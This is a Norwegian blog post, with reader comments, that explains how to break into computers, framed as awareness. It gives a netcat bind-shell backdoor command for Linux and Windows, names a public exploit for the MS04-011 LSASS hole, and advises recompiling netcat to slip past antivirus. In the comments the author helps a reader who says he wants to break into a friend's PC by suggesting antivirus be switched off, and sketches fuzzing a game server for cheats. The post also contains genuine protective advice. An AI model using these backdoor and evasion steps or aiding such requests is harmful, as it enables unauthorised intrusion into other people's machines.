Her er en oppskift på hvordan man kan gjøre innbrudd i andre datamaskiner på nett. Siden jeg vil holde meg innenfor lovens rammer vil jeg bryte meg inn hos meg selv. Denne teksten publiseres for å vise hvor enkelt det er, og for å opplyse om metoder som brukes -så man kan beskytte seg. Det tas ingen ansvar for feil og ulovlig bruk av informasjon i dette innlegget.
En bakdør
I dette første og enkle eksempelet vil jeg bruke Netcat som bakdør. Den er fleksibel og kan gjøre det meste. Netcat er et lite kommandolinjeprogram som ofte kalles bare nc. For å illustrere hva den er god for er den første setningen i manualsiden beskrivende: nc – TCP/IP swiss army knife.
Litt hypotetisk: Tenk om to PC’er er på ett nett. Den ene har IP adresse 192.168.0.2 og heter abc og den andre heter xyz. På PC abc kjører vi denne kommandoen:
user@abc~:$ nc -l -p 2000 -e /bin/sh
Da skal vi ha mekket en åpen port som venter på at vi kobler oss til. Når man kobler til port 2000 skal programmet sh kjøres. Om man vil gjøre noe lignende på en Windows maskin kan man feks kjøre programmet cmd.exe. Sånn kobler vi oss til fra PC xyz og tar en titt:
guest@xyz:~$ nc 192.168.0.2 2000 pwd /home/user ls Desktop Documents Examples Music Pictures Public Templates Videos
Kommandoene som ble gitt fra PC xyz etter tilkobling var pwd som viser gjeldene mappe i filsystemet man er i på PC abc, og ls viser filene og mappene på den plassen. Hvis man bare får lurt PC abc til å kjøre kommandoen den fikk i eksempelet kan man dermed få kontroll fra en annen PC. Nå burde litt forståelse for grunnleggende muligheter være på plass.
Utnytte ett sikkerhetshull
Jeg har tidligere skrevet om hvordan man kan finne sikkerhetshull på andre datamaskiner. For å putte inn en bakdør og ta kontroll over en annen PC må man først finne en svakhet. Her er ett eksempel på hvordan ett sikkerhetshull kan bli rapportert i en bit av Nessus Scan Report:
Vulnerability microsoft-ds (445/tcp)
Synopsis :
Arbitrary code can be executed on the remote host due to a flaw in the LSASS service.Description :
The remote version of Windows contains a flaw in the function DsRolerUpgradeDownlevelServer of the Local Security Authority server Service (LSASS) which may allow an attacker to execute arbitrary code on the remote host with the SYSTEM privileges.A series of worms (Sasser) are known to exploit this vulnerability in the wild.
Solution :
Microsoft has released a set of patches for Windows NT, 2000, XP and 2003 :http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
Risk factor :
Critical / CVSS Base Score : 10
(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)
CVE : CVE-2003-0533
BID : 10108
Other references : IAVA:2004-A-0006, OSVDB:5248
Nessus ID : 12209
Når man har funnet et sikkerhetshull kan man bruke feks Google til å lete etter metoder for å utnytte dette. Ved å bruke ordet exploit isammen med detaljer om ett detektert sikkerhetshull som søkeord finner man antagelig noe interessant. Enda mer interessante resultater kan man få ved å søke i listen over kjente exploit’s hos milw0rm (alle nødendige tekniske detaljer om dem ligger der). Nettstedene SecurityFocus, Digital Information Society og Hack In The Box har forøvrig masse informasjon om sikkerhetshull og utnyttelse av dem.
Hvis man er skikkelig hard-core (og kanskje har testet seg frem til ett sikkerhetshull som ikke andre har oppdaget enda) så kan man undersøke hva som skjer i RAM på PC’en med sikkerhetshullet. Sånn kan man analysere seg frem til hvordan man kan få ett program inn i hullet og få det til å kjøre.
Installere en bakdør
En del antivirusprogram oppdager Netcat, påstår at det er en bakdør og tar det bort. Selv om det finnes mange legitime grunner til å bruke programmet. Jeg bruker det nesten daglig i jobbsammenheng. For å komme rundt antivirusprogrammene kan det være nødvendig å hente kildekoden og kompilere en egen modifisert versjon (feks med kommandolinje-parameterene man vil bruke skrevet inn i kildekoden). Netcat er ett fleksibelt og lite program å lure inn i ett sikkerhetshull.
Hullet i Nessus eksempelet over hadde en enkel måte å installere bakdør på. Ved å kompilere hod-ms04011-lsasrv-expl.c og kjøre det med nødvendige kommandolinjeparametere er PC’en i den andre enden klar for å bli tilkoblet. Eksempler på hvordan finner du i filen som kan kompileres. Og ja, jeg testet at dette virker mot min egen PC -men nå er oppdatering på plass.
Andre metoder for angrep
Det å vise ett TIF bilde med Internet Explorer kan være farlig. Ihvertfall om bildet er tuklet med og PC’en som viser det ikke har aktuell oppdatering. Programmet for å lage ett bilde som kjører calc.exe ved å vise det er tilgjengelig for alle. Og programmet kan endres til å kjøre noe mindre uskyldig. Kanskje det ligger mange sånne bilder rundt omkring på Internett.
Nye virus oppdages hver dag. Mange av disse installerer en bakdør i PC’en som infiseres. For å nevne noen gamle eksempler så installerer virusene Mydoom og Sobig en bakdør i tillegg til å spre seg videre og gjøre ugang. Når mange PC’er gjør koordinert ugang samtidig kan det bli ubehagelig for feks både Microsoft og DOD.
Ajax og Web 2.0 er betegnelser på mer interaktiv web. Lekre greier. Det er til og med sånt her. Både klient (nettleseren din) og server (PC’en med denne bloggen) kan være utsatt. Ny teknologi som nesten plutselig sprer seg ut til massene kan bringe uante muligheter.
Hvordan beskytte seg
Man kan gjøre mye, men jeg synes det enkleste og viktigste er:
- Bruk en brannmur. En egen hardware boks (feks innebygget i en router) er fornuftig, men sånn software på hver PC bør også brukes.
- Ikke ha flere åpninger inn i systemet enn nødvendig. Med andre ord: steng alle porter som du ikke må ha åpne i brannmuren.
- Hold programvare som kommuniserer over nett oppdaterte. Automatiske oppdateringer bør med andre ord være på.
- Bruk ett antivirusprogram eller feks Ubuntu for ikke å ødelegge for deg selv. Automatisk oppdatering for deteksjon av nye virus bør være på.
- Hvis du bruker trådløst nettverk, så sørg for å bruke skikkelig kryptering. Spesielt interesserte kan lese om naboene mine og hvorfor WEP ikke er godt nok.
Terskelen for å komme inn i en datamaskin er relativt stor. Når man først har fått tilgang kan man gjøre det meste. Det å få slettet eller ødelagt informasjon eller programmer er langt i fra det værst mulige resultatet av et innbrudd. Kanskje er heller ikke det at andre kopierer data fra deg så farlig. En PC med en installert bakdør kan brukes til videre innbrudd eller distribuerte angrep på andre datamaskiner på nett. De mest utspekulerte cracker‘ene gjør gjerne akkurat det.
Er du trygg da?
Store endringer i software fører til at det innføres feil. Uansett hvor godt man tester. Til og med i software til fly. Det er tross alt bare mennesker som lager software, og det er en sammenheng mellom antall nye linjer med kode, hvor grundig ting blir testet og antall feil.
WordPress kommer snart ut med en ny stor oppdatering. Mange linjer kode er endret. Sannsynligheten for at den inneholder sikkerhetskritiske feil (inkludert sånne som ikke blir funnet av utviklerene og rettet) regner jeg som betydelig. Det bør være naturlig å spørre seg: er det lurt å oppdatere med en gang ny versjon dukker opp?
En egen hardware-boks med brannmur i er langt i fra alt du trenger av beskyttelse. Det skulle ikke forundre meg mye om feks MCF5223x familien av mikrokontrollere bor i noen sånne bokser. Utviklerene av software for den mikrokontrolleren tar sannsynligvis utgangspunkt i software fra produsenten. Den er smekkfull av sikkerhetshull og feil. Jeg gjorde ett forsøk på å hjelpe produsenten med noen av feilene (Eric som kommenterer på det innlegget jobber for produsenten) -men fikk ikke lov på grunn av brudd på lisensen med en underleverandør.
Windows Vista har helt ny software for TCP/IP. Det er litt av hvert som har med sikkerhet å gjøre i den, som sikkert er fint og flott. Men det hadde vært veldig rart om noe så komplekst er uten feil. Hvis man absolutt vil finne en sårbarhet som ikke er oppdaget enda er det nok bare å mekke en web-server som tuller med lavnivå protokoll-ting og putter inn mest mulig ulogiske verdier og sekvenser i de forskjellige feltene.
Spørsmål?
Tror du det var lurt å gå til denne siden med nettleseren din? Var det noe du lurte på? Spør i kommentarfeltet da vel.
Lignende innlegg
Flott at du skriver om dette,Petter. Men for meg som ikke er særlig teknisk anlagt hva gjelder nettet,er det litt gresk. Èn ting har jeg i hvertfall forstått;jeg går tydeligvis rundt og innbiller meg jeg er beskyttet når jeg har AdAware og Norton.
Jeg ser du viser til Ubuntu. Må man ikke bruke Linux for å kunne benytte det?
Vil bare gjøre deg oppmerksom på at om man klikker på den Kudosknappen,gir man kudos til et helt annet innlegg enn ditt.
Jeg opplevde det samme hos en annen også.
Når det gjelder Kudos til dette innlegget,la jeg det inn manuelt på kudos.no
Inni: Heisann, og takk for både Kudos og kommentar. Måtte legge inn en sånn knapp, men det tok litt tid å få mekket det uten skikkelig oppskrift. Nå tror jeg den skal være i orden.
Formålet med å skrive om dette er først og fremst å få folk til å tenke seg om. For ingen av de som er tilkoblet Internett er nok helt trygge. Ubuntu er en av de mange linux-distribusjonene, og jeg endret lenken til å peke på Wikipedia i steden. Den siden forklarer nok på en bedre måte.
God artikkel! Jeg ble såpass paranoid at jeg ble skeptisk til å trykke på den suspekte kudos-knappen. Hehe.
Espen: Takk
Trykte du? Og om du gjorde det -merket du om det skjedde noe spesielt?
Hehe. Jeg trykte. Pc-en eksploderte.
Mulig det rabler for meg eller min PC,men det som er “bak” den kudosknappen din…ler.. Det ser merkelig ut. Men nå kom jeg i hvertfall til ditt innlegg.
Espen:
Dette kommentarfeltet kan nok være enda skumlere å bruke. Da blir litt mer sånn AJAX-funksjonalitet tatt i bruk.
Inni: Gratulerer med kommentar nr 1500 her. Siden du kom hit igjen er det sikkert ikke noe å bry seg om. Alt er nok i orden
Både du og nettleseren din. Men er det noe du synes jeg burde forklart bedre eller lenket opp til mer informasjon?
Petter: Hva med å følge opp med en egen post om hvordan man beskytter pc-en sin?
Selv har jeg Windowsbrannmur, Norton-brannmur, oppdatert Norton, wpa2-kryptert trådløst nett, ikke-synlig trådløst nett, kjører Ad-Aware, Spybot og Ccleaner. Holder det?
Juhu! Det er noen som tør å kommentere her fortsatt. Finnes det flere som ikke pingler ut?
radiohode: Jeg gjorde ett forsøk på å skrive litt om hvordan man kan beskytte seg, men du har kanskje rett. Det kan være på sin plass med ett eget innlegg om det senere. Hvis du har oppdateringer på i Windows så er du nok bedre beskyttet enn de fleste. Norton, brannmurene og WPA2 er fornuftig. Ikke-synlig trådløst nett er egentlig synlig for de som vet hvordan de skal se, men det er ikke så farlig når du bruker WPA2. Men Ad-Aware vet jeg ikke helt hva jeg skal tro om. Kanskje det er greit med bare Spybot og Ccleaner.
Døde ikke AMIGA, da det ble fart i virus på disketter?
Menigmann hadde da ikke flere muligheter igjen!
De litt tekniske kjører fortsatt AMIGA!
Robert Sjølie
Robert: Amiga, ja! Det var tider, det
Trist med den konkursen. Uff, jeg savner dem enda jeg. Den spraylakkerte 500′en min med brytere, LED’er og gode greier. Og demo-parties på begynnelsen av 90-tallet. Det var vel på den tiden at virus på disketter for alvor begynte å dukke opp, ja. Nå om dagen er det nærmeste jeg kommer MCF52233 mikrokontrolleren. Den har (som du kanskje vet?) en CPU basert på Motorola 68000. Rimelig festlig å friske opp gamle assembly kunnskaper ved å fikse feil i oppstart-sekvensen på den. Men seriøst: bruker du Amiga fortsatt? Eller har du kanskje en lekker PC?
Og hvordan har du tenkt å hindre at du blir logget mens du driver å leker deg?
Med en slik fremgangsmåte vil det bli som “burning-by-learning”….oppdager raskt at du sitter med hue langt opp i rassen en du kunne forestille deg forut.
nasse nuff: Takk for godt spørsmål. Jeg har ikke behov for å ikke bli logget. Men hvis noen skulle ha det så kan de jo i teorien feks starte med å bruke naboens WLAN, få tilgang til en annen maskin på nett og kanskje bruke en proxy for å gjøre seg litt anonym og vanskelig å spore. En bakdør kan også være en port-scanner eller lignende. Nessus er delt i en server og klient-del. Serveren scanner, og klienten styrer det hele. Serveren kan antagelig puttes inn i ett sikkerhetshull, eller installeres om man har tilgang.
Slett siden.nå vet sånn cirka alle hvordan de skal bryte seg inn i en data.Veldig smart gjort,hva om en tyv leser dette?? For en idotisk birdag du har gitt til verden,oppfordrer til krimelle handlinger.
Igjen jeg ber degomåslette siden.
ja nå fikk jeg noen flere tips til og hacke meg inn i andres pc, passer meg perfekt he he
Don’t wanna: Jeg skjønner godt ditt synspunkt. Dette innlegget er omtrent på min egen grense for hva jeg synes er greit å informere om selv. Men jeg vil ikke slette av den grunn. For å sammenligne kan man tenke seg at noen fortalte om hvordan man kan gjøre innbrudd i hus, og beskrev forskjellige typer kubein, låser og dører. Sånn kan man gjøre folk oppmerksomme på hvilke typer dører og låser de bør benytte og hva de kan gjøre for å hindre at noen bryter seg inn hos dem. Lignende informasjon finnes andre steder på nett for de som gidder å lete (men kanskje ikke så detaljert satt sammen og på norsk). I det “området” hvor den mest essensielle kunnskapen trengs har jeg valgt å ikke fortelle om alle detaljene for å unngå at de som ikke kan så mye om dette klarer å få det til. Hensikten med innlegget er å gjøre folk oppmerksomme på problemet og å få dem til å beskytte seg.
Olaf: Det er ulovlig å bryte seg inn i andres PC uten tillatelse. Om du ønsker å gjøre nettopp det så er det lite jeg kan gjøre for å hindre deg (men vær klar over at jeg nå har IP adressen din).
Jøss! Skal si det ble liv her!
Inni: Ja, ikke sant? Det er helt greit at folk har sterke meninger om dette.
AMIGA, ja, kjører WB3.9 og FTP
Jeg er redd de som har hatt myndighet til å koble såkalte “Målelinjer”.
De har tilgang til å late som de er en annen, uten å bli
logget eller sett etter i sømmene!
Nå, kan de glede seg over tilgang til lagret informasjon!
Husker godt at det oppsto feil på forbindelsen, brått og
plutselig, de signaliserte seg imellom ved å lage feil
i feiltollerante protokoller som CRC (XModem) og
pakke sendinger med retry og resume (ZModem)!
Nå for tiden, legger de seg inn hvis du har sider med forvrengning.(HTTPS:)
Men mye er naturlig META signalisering, koder som betyr
noe i forbindelsen (kanalstyring, telleskritt, etc.)
Disse kodene gjemmer de godt. (‘=*’, ‘”‘, ‘*”‘, ‘=”‘.)
Før kunne du skrive ‘=”dir^m=”‘, og se hva de holdt på med!
Det er også koder som styrer prioriteten du har.
ESC er jo fortsatt i bruk i styring av printere osv., men det er vel få som vil infisere en extern enhet!?
Å hvem er interesert i at virus som regel deaktiviserer seg hvis du starter coden som ligger rett etter den første kommandoen i fila! (Bakdør.)
Nei, vi trenger nokk en internasjonal freshboot dag!
SUM: ikke bry dere om virus, skjer det noe,
frem med orginalplatene, og unngå
nettopp det som skjedde i fremtiden!
Robert Sjølie.
Jeg glemte å nevne at en del av det som skjer,
rett og slett er militær aktivitet,
og det kan man jo bare glede seg over!
R.S.
Robert:
(beklager at du havnet i moderasjonskø og tusen takk for gode kommentarer)
WB3.9… Oioi… Nå ble jeg fristet til en lang avsporing. Men for å holde meg til tema: Med AmigaOS bør man være relativt trygg, for jeg antar det ikke finnes mange nett-tilpassede virus til OS’et.
Det såkalte datalagringsdirektivet kan jeg bare stille meg i rekken og oppfordre andre til å ta standpunkt mot.
Disse “målelinjene” antar jeg har sammenheng med phreaking. Og https signalering kan være “neste generasjon”. Sånt har jeg ikke noe videre greie på, bortsett fra at jeg har lest litt om feks blue box.
Poengene dine med å starte på ny frisk en gang iblandt (hvis jeg forstår deg rett) er gode.
Så lenge den militære aktiviteten ikke går ut over personvernet synes jeg også den er verdifull. Det er fint at de tenker på teknologisk forsvar i krigføringen som foregår.
Hei!
Kjæresten min har en pc som hun i utgangspunktet fikk av sin ex for et års tid tilbake. Hun er urolig for at han på en eller annen måte har innsyn i hennes pc; f.eks så har hun forandret passordet på hotmailen sin flere ganger, men den knekkes hver gang, for hun merker at noen er der inne å sletter meldinger. Flere passord har vært fiklet med. Er det mulig at han har lagt inn et spionprogram som lar han få tilgang til hennes pc?
Hva kan han isåfall få tilgang til? (bilder, lydfiler, dokumenter etc)
Håper kanskje du kan hjelpe siden du virker litt mer lærd enn meg!
Takk for all hjelp.
Fred.
Hei Fredrik. Dette var gode og relevante spørsmål. Beklager at det tok litt tid å få svart. Har vært litt andre ting å pusle med i varmen
Selv om dette ikke er et område jeg har noe videre kunnskap om skal jeg forsøke å svare ut i fra programvare og bieffekter i virus som jeg har hørt og lest om. Av bakdører til feks Nessus finnes det lignende programvare som kan ha blitt brukt mot din kjæreste.
Programvare for logging av tastetrykk som feks periodisk sender data til spesifisert plass (feks til e-post) eller annen spyware har sannsynligvis blitt installert.
For å bekytte seg imot dette kan antivirus-programmer eller programmer for fjerning av spyware hjelpe, men om man er usikker på om en PC er infisert (uten at antivirus merker noe) bør man installere operativsystem på nytt (og fjerne det gamle i samme operasjon). Robert er inne på noe sånt litt opp i kommentarfeltet her. For å være mest mulig sikker bør da PC’en skrus av (så den ikke har strøm) og startes fra CD’en med operativsystemet som skal installeres. Da bør man også bytte passord rundt omkring etterpå. For å spore litt av: re-installering av operativsystem er en glimrende mulighet til å bytte fra feks Windows til Ubuntu.
Selv om det kan være lite betryggende: Ex’en kan i teorien ha fått tilgang til alle filer lagret på datamaskinen, all brukeraktivitet som er gjort på den og informasjon lagret andre plasser hvor passord er oppgitt på den aktuelle PC’en (men mulighetene hans til å selv kunne logge seg inn i nettbanken hennes er sannsynligvis små da bankene ofte har sikret seg relativt godt).
Håper dette var litt oppklarende. Bare å spørre om det var noe jeg ikke klarte å forklare godt.
Hei Petter. Har lest det du har skrevet og vil prøve å bryte meg inn i kompisenen min sin data for litt moro skyld. Vil bare vite om Netcat er et OK og lovlig program å bruke og om jeg ikke blir utsatt for noen annen risiko som; andre hacker seg inn på min pc, virus, spyware, bugger osv. Linken sender meg til Wikipedia og der er en link til Download Netcat. Er dette trygt?
Henrik: Netcat er et lite program som følger med de aller fleste (alle?) linux-distribusjoner. Hvis man ikke setter det opp til å være en bakdør som andre vet om så er det helt trygt. Den nedlastbare Windows versjonen kan kanskje bli stengt av antivirus-program -men bare slå av antivirus sjekk under testingen deres. Hvis dere vil ha på antivirus-sjekk må dere nok kompilere en egen modifisert versjon av netcat.
(det kan være mindre trygt å laste inn denne nettsiden i nettleseren din enn å bruke netcat)
Heisann.
Du har fått en kjempeflott side her. Siden du ser ut til å ha ekstremt mye kunnskap innen data, lurer jeg på om du er god å finne bugs/exploits innen nettspill.
Takker for hyggelig tilbakemelding. Jeg forsøker å svare med teoretiske hypoteser -ikke egen erfaring.
Ang spill på nett og testing av sikkerhetshull:
- En metode er “tradisjonell” testing mot serveren -uten å gå mot selve spill-tjenesten som sådan. Da kan testingen automatiseres ved hjelp av feks egenprodusert programvare eller Nessus som beskrevet her. Med tilgang kan man tukle i det som kjører i eller ligger på serveren fra innsiden.
- En annen metode (som antagelig er vanskelig å automatisere) er å lete seg frem til sikkerhetshull i selve spillet. Det kan nok være svært vanskelig å både finne frem til sånne og å utnytte dem -hvis det i det hele tatt er mulig (er nok avhengig av hvordan spillet virker).
- En tredje metode er å lete etter eventuelle bakdører i spillet som utviklere har lagt inn (feks for spilltestere). Å finne frem til sånne er kanskje enklest ved hjelp av steinalderteknologi. Detektivarbeid om personer som har med spillet å gjøre, ring og prat med dem, osv. Med andre ord: sosial “hacking”.
Det å lete etter sikkerhetshull eller noe annet som kan utnyttes på servere du ikke eier eller har tillatelse til å tukle med kan være ulovlig. Det å utnytte sikkerhetshull uten tillatelse (=innbrudd) er ulovlig.
Jeg er egentlig svært lite interessert i spill selv. Derfor finner jeg ikke temaet nevneverdig interessant.
Spillet det i hovedsak var snakk om var tekstbasert og har eksistert siden 2005. Det har fantes hull/bugs/exploits siden den gang. Utviklerne har med tiden tettet hullene som har vært klassifisert som “veldig alvorlig”, men dessverre kan det ta opptil flere måneder før de finner og reparer andre feil.
De fleste brukerne av spillet, bruker såkalte bugs. Som utviklerne fortsatt ikke han funnet og fikset.
Derfor har jeg gitt opp, og er på utkikk etter noen som kan finne metoder for å finne forskjellige bugs. Enten i form av pengebug, poengbug, “lage gjeng”-bug osv. Noe som kan være til fordel i selve spillet. Få høyere verdier rett og slett.
Spillet bruker å være nede hver søndags morgen i 1 time. Da utnytter de fleste den laggen for å skaffe seg høyere rank, mer penger og poeng. Siden laggen gjør at man kan utføre flere handlinger på kort tid. (Uten å måtte vente x antall minutter for å bruke funksjonen om igjen)
Men siden jeg har en anelse om at du ikke er så interissert i dette temaet, lurer jeg på om du i det minste vet hvordan enkleste måte kan være for å finne disse bakveiene eller bugene. (?) Må man bruke forskjellige program?
Spillet er generelt sett kodet på en ræva måte etter hva jeg forstår. Utvikleren har kopiert koder fra andre steder.
Hvis spillet foregår med ASCII (tekst) kan det være enklere å automatisere test.
Temaet om spill interesserer meg ikke stort, så jeg gulper bare opp en tankerekke som det kan være ulovlig å utføre. Siden det kan være ulovlig å oppfordre til lovbrudd vil jeg fraråde deg å gjøre dette:
1) Se på trafikk imellom din PC og spill-server med feks Wireshark når du spiller. Hvilken port brukes? Hvordan ser protokollen ut? (Jeg har lenge tenkt på å skrive et innlegg på denne bloggen om hvordan man kan dekode nettverkstrafikk. Det blir i tilfelle antagelig en innføring i bruk av Wireshark, men om jeg tar meg tid til det gjenstår å se.)
2) Lag et program som sender tekst/data i forskjellige sekvenser og varianter på lignende måte som PC’en din gjør mot spill-server når du spiller. Siden programmet trenger å “oppføre seg” på lignende måte som en spiller vil det være nødvendig med noe spesialtilpasset det ene spillet. En grei plass å begynne kan være å lære seg feks C/C++. Funksjoner som kan være nyttige i den forbindelse: sprintf, sscanf, socket, connect, send, recv, rand.
3) Finn en metode for å se at du har oppnådd juks og fanteri automatisk fra programmet (feks sende en sekvens med tekst og undersøke svar).
4) Kjør programmet: en lang test med tilfeldig variasjon i sekvenser og tekst/data og periodisk sjekk om et mål er oppnådd.
Punktene over er forresten ikke spesielt tilpasset nett-spill. Brukere som kommuniserer med tjenester/applikasjoner på servere er sammenlignbart med spiller, spill og spill-server.
Nesten helt i starten skriver du:
“Om man vil gjøre noe lignende på en Windows maskin kan man feks kjøre programmet cmd.exe. Sånn kobler vi oss til fra PC xyz og tar en titt”
Av det forstår jeg det slik at jeg kan bruke cmd, men jeg skjønte ikke hva var det jeg skulle skrive inn der for å få det til? Hadde det noe med dette å gjøre?:
“guest@xyz:~$ nc 192.168.0.2 2000
pwd
/home/user
ls
Desktop
Documents
Examples
Music
Pictures
Public
Templates
Videos”
“/bin/sh” på en Linux-PC er en kommandolinje. Med den kan man feks gi kommando om å gå til en mappe (cd) og vise filene som ligger der (ls).
På en Windows-PC er “cmd.exe” (som du også kan kjøre ved å trykke på “Start -> Alle programmer -> Tilbehør -> Ledetekst”) en kommandolinje. Med den kan man bruke kommandoene “cd” og “dir” på omtrent samme måte som cd/ls med Linux. Hvis PC abc i eksempelet over er en Windows-PC kan man kjøre denne kommandoen på den istedenfor det med “/bin/sh”:
user@abc~:$ nc -l -p 2000 -e cmd.exeFor å illustrere mer om mulighetene: eksempler på andre kommandoer man kan gi med en kommandolinje er:
- skriv innholdet av en fil på skjermen
- kopier til en eller annen plass
- overfør til et annet sted feks på Internett
- slett en fil
Takker for hjelp med å finne frem til uforståelige formuleringer og detaljer.
Hei Petter, jeg skriver til deg fordi jeg er fortvilet og trenger din kompetanse. Jeg har vært utsatt for at noen har har sendt meg mail til gmail og sier at han deretter kan lese inn og utgående mail fra meg. Jeg aner ikke hvem denne personen er, han vet likevel mye om meg ang hvor jeg bor osv. Har også mottatt vanlige brev fra ham. Vet ikke om jeg skal politianmelde eller hvordan jeg skal forholde meg til dette, kan du hjelpe, har du noen tips?
Hei, og takk for tilliten.
Hvis han kan lese innkommende og utgående e-post på din gmail-konto så bør du kunne “stenge ham ute” ved å bytte passord på gmail-kontoen. Brukernavn og passord på den kontoen skal bare oppgis på Google sine sider.
Eksempel på nettside som ikke er Google sin:
google.abc.com
…og eksempel på nettside som er Google sin:
abc.google.com
…og “abc” kan igrunn byttes ut med hva som helst.
Trådløst nettverk bør være kryptert (helst med WPA2 eller bedre) for å hindre at andre kan spionere på alt (!) som foregår imellom PC-er og Internett.
Siden jeg er relativt paranoid:
Hvis personen fortsatt påstår at han kan lese e-posten din (og kanskje uansett?) bør du være helt sikker ved å installere operativsystem på nytt på PC-en din (for å fjerne eventuell programvare som han har fått til å kjøre på den for å spionere på deg) og bytte passord (igjen) på gmail etterpå. For å være relativt sikker på å ikke få spionprogramvare på PC-en bør du ha en automatisk oppdatert antivirus, automatisk oppdatering i windows på (eller enda bedre: bruke et tryggere operativsystem enn Windows), ikke dobbelt-trykke ukritisk på feks vedlegg i e-post (med mindre du mener avsender er snill og i stand til å beskytte PC-en sin samt at avsender er den det ser ut til å være). Lenker til steder på Internett kan det også være “skummelt” å trykke på.
Å lese e-posten din uten ditt samtykke er i følge $145 i straffeloven ulovlig. $390a er nok også relevant.
…også jeg som hadde planer om å bare svare kort…
PS: Jeg har ikke peiling på juss. Politiet og/eller en advokat kan sikkert hjelpe mer. Jeg mistenker at politiet ikke prioriterer sånt.
Tusen takk for grundig svar, er ikke datakyndig selv og må se hvordan jeg skal gå fram for å følge dine råd. Jeg innrømmer at jeg ikke har vært tilstrekkelig opptatt av datasikkerhet, har i min naivitet tenkt at jeg ikke kan være interessant for noen å “spionere” på. I følge en venn av meg som er politi er det lite sannsynlig at en anmeldelse vil føre til annet enn henleggelse så lenge det ikke forekommer trusler og kan gå under “truende adferd”, men som deg foreslo han å installere programvare på nytt. Vil man være sikrere med MAC?
Igjen, tusen takk!
MAC er sikrere, ja. Og feks Ubuntu (en variant av Linux, som er relativt brukervennlig og på en måte sammenlignbar med kombinasjonen Windows+Office+Photoshop+++).
Med håp om og tro på at det løser seg: lykke til!
Heisann.. Tenkte du kanskje var innom her en gang i blandt fortsatt… Har ett spørsmål til deg, som du kanskje kan hjelpe meg med.
Det har vært beskrevet opp, ned og i mente at man kan skrive inn cmd.exe og deretter komme inn på admin-kto’n. Hvordan kommer man seg inn på windows først, uten å kunne passordet til brukeren?? Tips??
Hei Ståle. Jeg er innom her når jeg får e-post fordi noen kommenterer og når jeg føler for å skrive noe nytt. Flott at du graver etter mer info. Jeg skal gjøre et forsøk på å forklare. Si mer enn gjerne i fra om jeg ikke klarer å formulere meg forståelig.
cmd.exe er et lite program man kan få til å kjøre via nc ved å putte nc inn i et sikkerhetshull. Mange andre programmer kan i teorien puttes inn i sikkerhetshull. Feks server-delen av TightVNC. Da kan man etterpå koble til med klient-delen av TightVNC og vise Windows GUI-et på en annen PC. Noen forutsetninger for at det skal virke er at eventuelle brannmurer ikke stenger for VNC-tilkoblig og at administrator allerede er innlogget på PC-en som blir lurt til å kjøre server-delen av TightVNC.
Det er kanskje aller enklest å bruke Cain and Abel eller Metasploit Framework for å få til noe sånt. Jeg burde nok skrive noe her på bloggen om Metasploit.
Siden jeg ikke vil oppfordre til lovbrudd: husk å ikke bryte deg inn på en PC uten å eie den selv eller ha tillatelse.
Flott. Takk for tilbakemelding. Nå merker jeg meg at du er noget mer bevandret innen pc’er enn jeg er, for du er et par mil over hodet mitt.
Skal nå uansett ta med maskinen tilbake til han jeg fikk den av, slik at han får åpnet den. Det er tross alt han som eide maskinen tidligere, så vi får se om vi finner admin-passordet da. Men takk for innlegget, til tross for at jeg ikke har kompetanse til å bruke det.
Ståle
Å… Så du har fysisk tilgang til PC-en som du vil komme inn på. Da blir det mye enklere. Du kan nok bruke feks Offline NT Password & Registry Editor.
Oppskriftene ellers på denne siden kan brukes når man ikke har fysisk tilgang til PC-en i den andre enden.
Takk for hjelpen, selv med mine begrensede kunnskaper fikk jeg det til. Fikk riktignok ikke slette admin-passordet, men fant en annen bruker jeg fikk slettet passordet på, så da er jeg ihvertfall inne. Så får jeg heller teste cmd.exe og se om jeg kommer inn der.. Tror jeg fant noe om det på nettet også…
Takketakk!
ha en strålende dag videre!
Mvh
Ståle
Endelig! Kjørte dette programmet du foreslo(og har laget, skjønte jeg) enda en gang, og testet Administrator som brukernavn, uten passord, og vips; I’m IN!!
Yohoo!! Da var dagen reddet.
Takk for all hjelp!
Ståle